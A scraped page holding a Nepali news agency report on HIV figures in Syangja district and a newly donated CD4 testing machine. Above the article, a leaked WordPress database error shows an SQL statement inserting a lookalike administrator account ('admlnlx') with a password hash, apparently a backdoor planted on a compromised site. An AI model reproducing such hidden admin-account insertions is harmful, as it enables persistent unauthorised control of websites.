WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bt8vxOQt2XgNubwEX/7xsLnJofbxtZ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 16:02:20', '', 'admlnlx', 'admlnlx')
वालिङ, माघ ११–
स्याङ्जामा एचआइभी सङ्क्रमितको सङ्ख्या २५७ रहेको छ । जिल्ला स्वास्थ्य कार्यालयका एचआइभी÷एड्स कार्यक्रम संयोजक पदमप्रसाद पाण्डेका अनुसार जिल्लामा ३४ बालबालिकासहित १३३ महिला र १२४ पुरुष गरी कुल २५७ जना एचआइभी सङ्क्रमित रहेका छन् ।
स्याङ्जा तथा आसपासका जिल्लाका एचआइभी सङ्क्रमितको सुविधालाई मध्यनजर गरी जिल्ला अस्पताल स्याङ्जामा सिडीफोर उपकरण जडान गरिएको छ । एचआइभी÷एड्स तथा यौनरोग नियन्त्रण केन्द्र टेकु काठमाडौँले करिब रु १५ लाख मूल्य बराबरको उपकरण निःशुल्क उपलब्ध गराएपछि एचआइभी सङ्क्रमितलाई सेवा लिनका लागि सहज हुने भएको हो ।
“यो उपकरण जिल्लामा नहुँदा यहाँका सङ्क्रमित सिडीफोर परीक्षणका लागि अन्यत्र जानुपर्ने बाध्यता थियो”, जिल्ला स्वास्थ्य कार्यालयका एचआइभी÷एड्स कार्यक्रम संयोजक पाण्डेले भन्नुभयो, “अब सिडीफोर जहाँ परीक्षण हुन्छ, त्यहीँ नै औषधि पनि पाइने व्यवस्था मिलाएका छौँ ।”
करिब छ वर्षअघिदेखि स्याङ्जा जिल्ला अस्पतालमा एचआइभी सङ्क्रमितको तथ्याङ्क राख्न सुरु भएपछि हालसम्म १९ पुरुष र सात महिला गरी २६ जनाको ज्यान गइसकेको छ भने जिल्लामा एआरटी सेवन गर्नेको सङ्ख्या १९९ रहेको छ । –रासस